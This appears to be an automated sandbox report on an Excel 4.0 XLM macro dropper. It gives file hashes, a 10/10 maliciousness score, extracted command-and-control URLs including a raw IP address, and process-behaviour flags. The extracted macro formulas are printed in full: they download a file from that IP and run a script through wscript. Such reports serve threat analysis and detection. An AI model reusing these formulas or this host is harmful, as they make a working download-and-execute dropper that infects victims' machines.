General

  • Target

    016618c8148996000ee1d520a6604220

  • Size

    6KB

  • Sample

    231221-1j52esabf9

  • MD5

    016618c8148996000ee1d520a6604220

  • SHA1

    0a930b9c9030e9b8a6dfc700d7f2fdd7299c0ffc

  • SHA256

    f2df034bf7c2cc2cddc5205a69a057f48680e44fa59b042998a541bdd29e3887

  • SHA512

    d6718013ee24ae12bce876867ace088382648df85fb1588b881da9ea3b26c6c44b577170e21fc570c5de97b499d75131d8ca05741cc45c75129a967c3efc42e6

  • SSDEEP

    192:NDSvuSRbrA2OmmfRI8UhHFBFYumb98ygF+T:NcuuM2we1FYTb98ygO

Score
10/10
xlm

Malware Config

Extracted

Rule
Excel 4.0 XLM Macro
C2

http://46.17.98.187/index.php

http://google.com/index.php

Attributes
  • formulas

    =CALL("Urlmon","URLDownloadToFileA","JJCCJJ",0,"http://46.17.98.187/index.php","C:\~\pes.msi",0,0) =CALL("Urlmon","URLDownloadToFileA","JJCCJJ",0,"http://google.com/index.php","C:\~\pes.msi",0,0) =EXEC("wscript C:\zer\spp.vbs") =HALT()

Extracted

Language
xlm4.0
Source
URLs
xlm40.dropper

http://46.17.98.187/index.php

xlm40.dropper

http://google.com/index.php

Extracted

Language
xlm4.0
Source
URLs
xlm40.dropper

http://46.17.98.187/index.php

Targets

    • Target

      016618c8148996000ee1d520a6604220

    • Size

      6KB

    • MD5

      016618c8148996000ee1d520a6604220

    • SHA1

      0a930b9c9030e9b8a6dfc700d7f2fdd7299c0ffc

    • SHA256

      f2df034bf7c2cc2cddc5205a69a057f48680e44fa59b042998a541bdd29e3887

    • SHA512

      d6718013ee24ae12bce876867ace088382648df85fb1588b881da9ea3b26c6c44b577170e21fc570c5de97b499d75131d8ca05741cc45c75129a967c3efc42e6

    • SSDEEP

      192:NDSvuSRbrA2OmmfRI8UhHFBFYumb98ygF+T:NcuuM2we1FYTb98ygO

    Score
    10/10
    • Process spawned unexpected child process

      This typically indicates the parent process was compromised via an exploit or macro.

    • Process spawned suspicious child process

      This child process is typically not spawned unless (for example) the parent process crashes. This typically indicates the parent process was unsuccessfully compromised.

MITRE ATT&CK Enterprise v15

Tasks